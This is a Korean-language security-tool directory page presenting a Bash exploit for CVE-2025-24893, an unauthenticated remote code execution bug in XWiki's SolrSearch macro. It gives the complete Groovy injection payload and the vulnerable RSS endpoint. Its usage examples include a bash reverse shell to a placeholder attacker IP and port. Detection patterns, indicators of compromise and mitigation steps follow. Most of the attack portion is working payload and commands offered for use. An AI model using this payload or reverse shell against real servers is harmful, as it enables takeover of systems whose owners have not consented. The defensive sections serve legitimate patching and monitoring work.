Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — Bash 익스플로잇 for CVE-2025-24893, XWiki Platform에서 SolrSearch 매크로의 템플릿 주입을 통한 인증되지 않은 원격 코드 실행 취약점 | Kitploit
도구/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlPayload Development
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

Bash 익스플로잇 for CVE-2025-24893, XWiki Platform에서 SolrSearch 매크로의 템플릿 주입을 통한 인증되지 않은 원격 코드 실행 취약점

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
8개월 전아직 검토되지 않음

XWiki 플랫폼 인증되지 않은 원격 코드 실행 익스플로잇

개요

이 스크립트는 CVE-2025-24893의 영향을 받는 XWiki Platform 버전을 대상으로 하는 익스플로잇의 Bash 구현을 재구성한 것입니다. SolrSearch 매크로의 템플릿 주입 결함을 통해 인증되지 않은 공격자가 임의의 Groovy 코드를 실행할 수 있는 치명적인 취약점을 활용합니다.

원래 Python 기반의 익스플로잇 구현은 여러 보안 연구자가 제작했으며, 여기서는 간소화된 실행 및 향상된 사용성을 위해 Bash 사용자에 맞게 조정되었습니다.

취약점 세부 정보

  • 발견자: John Kwak (Trend Micro's Zero Day Initiative)
  • CVE: CVE-2025-24893
  • CVSS 점수: 9.8 (치명적)
  • 참고 자료:
    • XWiki 공식 보안 권고 (GHSA-rr6p-3pfg-562j)
    • CISA 알려진 익스플로잇 취약점 카탈로그
    • VulnCheck - XWiki CVE-2025-24893 실제 환경에서 익스플로잇됨
    • OffSec 블로그 - XWiki의 인증되지 않은 RCE
  • 설명: 이 취약점은 XWiki Platform 내 SolrSearch 매크로의 부적절한 입력 처리에서 비롯됩니다. 이 매크로는 RSS 미디어 엔드포인트를 통해 접근할 때 text 파라미터의 사용자 제공 입력을 제대로 검증 및 정제하지 못하여, 공격자가 인증 없이 악성 Groovy 코드를 렌더링 파이프라인에 주입할 수 있습니다.

영향을 받는 버전 및 패치된 버전

영향을 받는 버전

  • XWiki Platform: 5.3-milestone-2 ~ 15.10.10
  • XWiki Platform: 16.0.0-rc-1 ~ 16.4.0

패치된 버전

  • XWiki 15.10.11 이상
  • XWiki 16.4.1 이상
  • XWiki 16.5.0RC1 이상

기능

  • 인증되지 않은 RCE: 인증 없이 임의의 시스템 명령을 실행합니다.
  • CSRF 토큰 우회: CSRF 토큰 없이 템플릿 주입을 익스플로잇합니다.
  • 백그라운드 실행: 대상 서버에서 명령을 비동기적으로 실행합니다.
  • 간단한 명령줄 인터페이스: 최소한의 종속성으로 사용하기 쉬운 Bash 스크립트입니다.

사전 요구 사항

  • 종속성:
    • curl: HTTP 요청 전송용.
    • jq: 페이로드 URL 인코딩용.
    • Bash 셸.
  • 테스트 환경: Linux OS with Bash.

사용법

실행 권한을 부여합니다:

root@kitploit:~
chmod +x CVE-2025-24893

필요한 인수와 함께 스크립트를 실행합니다:

root@kitploit:~
./CVE-2025-24893 <target_url> <command>

매개변수

매개변수설명
<target_url>대상 XWiki URL (예: http://example.com 또는 https://xwiki.example.org). 프로토콜은 선택 사항입니다.
<command>대상 서버에서 실행할 시스템 명령입니다.

예제

대상이 취약한지 확인 (id 명령 실행):

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "id"

시스템 정보 조회:

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "uname -a"

테스트 파일 생성:

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "touch /tmp/pwned"

리버스 셸 (자신의 IP와 포트로 바꾸세요):

root@kitploit:~
./CVE-2025-24893 http://vulnerable-xwiki.example.com "bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"

스크립트 작업 흐름

  1. 명령줄 인수 파싱:

    • 대상 URL과 명령이 모두 제공되었는지 확인합니다.
    • 프로토콜이 지정되지 않은 경우 http://를 추가하여 URL을 정규화합니다.
  2. 페이로드 구성:

    • .execute()를 사용하여 지정된 명령을 실행하는 Groovy 코드 페이로드를 구성합니다.
    • 페이로드를 XWiki 매크로 구문으로 감쌉니다: }}}{{async async=false}}{{groovy}}<code>{{/groovy}}{{/async}}
  3. URL 인코딩:

    • jq를 사용하여 페이로드를 URL 인코딩하여 적절한 HTTP 전송을 보장합니다.
  4. 익스플로잇:

    • 취약한 SolrSearch 엔드포인트에 HTTP GET 요청을 전송합니다: /xwiki/bin/get/Main/SolrSearch?media=rss&text=<encoded_payload>
    • 명령은 대상 서버에서 백그라운드로 실행됩니다.

기술적 세부 사항

익스플로잇 메커니즘

익스플로잇 체인은 다음과 같이 작동합니다:

  1. 템플릿 주입: 공격자는 XWiki 매크로 구문으로 감싸진 Groovy 코드를 포함하는 악성 페이로드를 제작합니다.
  2. 엔드포인트 대상 지정: 페이로드는 취약한 SolrSearch RSS 엔드포인트로 전송됩니다.
  3. 코드 실행: 주입된 Groovy 코드가 인증 없이 서버 측에서 실행됩니다.
  4. 시스템 노출: 공격자는 XWiki 애플리케이션의 권한으로 임의의 코드 실행을 얻습니다.

페이로드 구조

root@kitploit:~
}}}{{async async=false}}{{groovy}}'<command>'.execute();{{/groovy}}{{/async}}
  • }}} - 기존 매크로 컨텍스트 종료
  • {{async async=false}} - 동기 실행 보장
  • {{groovy}}...{{/groovy}} - 악성 Groovy 코드 감쌈
  • '<command>'.execute(); - 지정된 시스템 명령 실행

개념 증명

취약한 환경 설정

테스트 목적으로 Docker를 사용하여 취약한 XWiki 인스턴스를 설정할 수 있습니다:

root@kitploit:~
docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10

익스플로잇 데모

root@kitploit:~
# XWiki가 시작될 때까지 기다립니다 (1-2분 소요 가능)
./CVE-2025-24893 http://localhost:8080 "whoami"

영향

이 취약점을 성공적으로 익스플로잇하면 인증되지 않은 공격자가 다음과 같은 작업을 수행할 수 있습니다:

  • 서버에서 임의의 시스템 명령 실행
  • 민감한 데이터 읽기, 수정 또는 삭제
  • 전체 XWiki 설치 손상
  • 네트워크상의 다른 시스템으로 피벗
  • 암호화폐 채굴기 또는 기타 악성코드 배포
  • 지속적인 백도어 접근 설정

실제 익스플로잇

CISA 및 여러 보안 공급업체에 따르면:

  • 활성 익스플로잇: CVE-2025-24893이 실제 환경에서 활발히 익스플로잇되고 있습니다.
  • 공격 캠페인: VulnCheck는 암호화폐 채굴기를 배포하는 2단계 공격 체인을 탐지했습니다.
  • CISA KEV 카탈로그: 2025년 10월 30일에 알려진 익스플로잇 취약점 카탈로그에 추가되었습니다.
  • 광범위한 스캐닝: 취약한 인스턴스를 대상으로 하는 대규모 인터넷 전체 스캔이 이루어지고 있습니다.

탐지 및 완화

탐지

SolrSearch 엔드포인트에 대한 의심스러운 요청을 모니터링하십시오:

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*

다음을 포함하는 패턴을 찾으십시오:

  • {{groovy}}
  • {{async}}
  • .execute()
  • 위 패턴의 URL 인코딩 변형

침해 지표 (IoCs)

  • XWiki 애플리케이션 사용자가 생성한 예상치 못한 프로세스
  • /tmp 또는 기타 쓰기 가능한 디렉토리의 새 파일
  • 알 수 없는 IP로의 아웃바운드 네트워크 연결
  • 암호화폐 채굴 프로세스 (높은 CPU 사용량)

완화

  1. XWiki 업그레이드를 패치된 버전으로:

    • 버전 15.10.11 이상
    • 버전 16.4.1 이상
    • 버전 16.5.0RC1 이상
  2. 임시 해결 방법 적용 (즉시 패치가 불가능한 경우):

    • 웹 애플리케이션 방화벽(WAF)을 통해 SolrSearch 엔드포인트에 대한 접근 제한
    • 필요하지 않은 경우 SolrSearch 매크로 비활성화
    • 네트워크 세분화를 구현하여 노출 제한
  3. 침해 모니터링:

    • 익스플로잇 시도에 대한 로그 검토
    • 승인되지 않은 파일 수정 확인
    • 암호화폐 채굴기 및 백도어 스캔

제한 사항

  • 명령이 백그라운드에서 실행되므로 출력이 즉시 표시되지 않을 수 있습니다.
  • 명령 실행 확인은 부채널 방법(예: 파일 생성, 네트워크 연결)이 필요합니다.
  • 대상에 SolrSearch 매크로가 활성화되어 있어야 합니다(기본 구성).

크레딧

  • 취약점 발견자: John Kwak (Trend Micro's Zero Day Initiative)
  • 원본 Python 익스플로잇 제작자: 여러 보안 연구자
  • 조정된 스크립트: [0xdtc]에 의해 재구성됨 (BASH 기반)

면책 조항

이 스크립트는 교육 목적으로만 제공됩니다. 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 대해 이 도구를 무단으로 사용하는 것은 불법이며 비윤리적입니다. 책임감 있게 사용하십시오.

테스트 전에 시스템 소유자로부터 명시적인 서면 허가를 받아야 합니다.

이 도구의 작성자는 이 스크립트의 오용이나 손해에 대해 책임을 지지 않습니다. 사용자는 적절한 권한을 보유하고 모든 관련 법률 및 규정을 준수할 전적인 책임이 있습니다.

도구 다운로드